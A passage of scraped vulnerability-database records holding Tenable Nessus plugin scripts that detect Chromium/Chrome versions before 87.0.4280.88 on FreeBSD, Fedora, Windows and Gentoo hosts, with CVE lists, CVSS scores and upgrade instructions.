:\n\n- [1142331] High CVE-2020-16037: Use after free in clipboard. Reported\nby Ryoya Tsukasaki on 2020-10-26\n\n- [1138683] High CVE-2020-16038: Use after free in media. Reported by\nKhalil Zhani on 2020-10-14\n\n- [1149177] High CVE-2020-16039: Use after free in extensions.\nReported by Anonymous on 2020-11-15\n\n- [1150649] High CVE-2020-16040: Insufficient data validation in V8.\nReported by Lucas Pinheiro, Microsoft Browser Vulnerability Research\non 2020-11-19\n\n- [1151865] Medium CVE-2020-16041: Out of bounds read in networking.\nReported by Sergei Glazunov and Mark Brand of Google Project Zero on\n2020-11-23\n\n- [1151890] Medium CVE-2020-16042: Uninitialized Use in V8. Reported\nby Andre Bargull on 2020-11-2\"\n );\n # https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b9934e1\"\n );\n # https://vuxml.freebsd.org/freebsd/01ffd06a-36ed-11eb-b655-3065ec8fd3ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?79a19458\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<87.0.4280.88\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:54:03", "description": "Update to 87.0.4280.88. As with pretty much every chromium release ever, this fixes some security bugs. This batch is :\n\nCVE-2020-16037 CVE-2020-16038 CVE-2020-16039 CVE-2020-16040 CVE-2020-16041 CVE-2020-16042\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-10T00:00:00", "type": "nessus", "title": "Fedora 33 : chromium (2020-f43efd09e8)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2020-F43EFD09E8.NASL", "href": "https://www.tenable.com/plugins/nessus/144036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-f43efd09e8.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144036);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n script_xref(name:\"FEDORA\", value:\"2020-f43efd09e8\");\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"Fedora 33 : chromium (2020-f43efd09e8)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 87.0.4280.88. As with pretty much every chromium release\never, this fixes some security bugs. This batch is :\n\nCVE-2020-16037 CVE-2020-16038 CVE-2020-16039 CVE-2020-16040\nCVE-2020-16041 CVE-2020-16042\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-f43efd09e8\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"chromium-87.0.4280.88-1.fc33\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:55:39", "description": "The version of Google Chrome installed on the remote Windows host is prior to 87.0.4280.88. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_12_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-03T00:00:00", "type": "nessus", "title": "Google Chrome < 87.0.4280.88 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_87_0_4280_88.NASL", "href": "https://www.tenable.com/plugins/nessus/143471", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143471);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2020-16037\",\n \"CVE-2020-16038\",\n \"CVE-2020-16039\",\n \"CVE-2020-16040\",\n \"CVE-2020-16041\",\n \"CVE-2020-16042\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"Google Chrome < 87.0.4280.88 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 87.0.4280.88. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_12_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b9934e1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1142331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1138683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1149177\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1151865\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1151890\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 87.0.4280.88 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16039\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'87.0.4280.88', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:55:43", "description": "Update to 87.0.4280.88. As with pretty much every chromium release ever, this fixes some security bugs. This batch is :\n\nCVE-2020-16037 CVE-2020-16038 CVE-2020-16039 CVE-2020-16040 CVE-2020-16041 CVE-2020-16042\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-21T00:00:00", "type": "nessus", "title": "Fedora 32 : chromium (2020-5b9c42f1b9)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2020-5B9C42F1B9.NASL", "href": "https://www.tenable.com/plugins/nessus/144487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-5b9c42f1b9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144487);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n script_xref(name:\"FEDORA\", value:\"2020-5b9c42f1b9\");\n\n script_name(english:\"Fedora 32 : chromium (2020-5b9c42f1b9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 87.0.4280.88. As with pretty much every chromium release\never, this fixes some security bugs. This batch is :\n\nCVE-2020-16037 CVE-2020-16038 CVE-2020-16039 CVE-2020-16040\nCVE-2020-16041 CVE-2020-16042\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-5b9c42f1b9\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"chromium-87.0.4280.88-1.fc32\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:55:11", "description": "The remote host is affected by the vulnerability described in GLSA-202012-05 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-07T00:00:00", "type": "nessus", "title": "GLSA-202012-05 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16014", "CVE-2020-16015", "CVE-2020-16018", "CVE-2020-16019", "CVE-2020-16020", "CVE-2020-16021", "CVE-2020-16022", "CVE-2020-16023", "CVE-2020-16024", "CVE-2020-16025", "CVE-2020-16026", "CVE-2020-16027", "CVE-2020-16028", "CVE-2020-16029", "CVE-2020-16030", "CVE-2020-16031", "CVE-2020-16032", "CVE-2020-16033", "CVE-2020-16034", "CVE-2020-16036", "CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202012-05.NASL", "href": "https://www.tenable.com/plugins/nessus/143495", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202012-05.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143495);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\"CVE-2020-16014\", \"CVE-2020-16015\", \"CVE-2020-16018\", \"CVE-2020-16019\", \"CVE-2020-16020\", \"CVE-2020-16021\", \"CVE-2020-16022\", \"CVE-2020-16023\", \"CVE-2020-16024\", \"CVE-2020-16025\", \"CVE-2020-16026\", \"CVE-2020-16027\", \"CVE-2020-16028\", \"CVE-2020-16029\", \"CVE-2020-16030\", \"CVE-2020-16031\", \"CVE-2020-16032\", \"CVE-2020-16033\", \"CVE-2020-16034\", \"CVE-2020-16036\", \"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n script_xref(name:\"GLSA\", value:\"202012-05\");\n script_xref(name:\"IAVA\", value:\"2020-A-0533-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"GLSA-202012-05 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202012-05\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202012-05\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-87.0.4280.88'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-87.0.4280.88'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16039\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 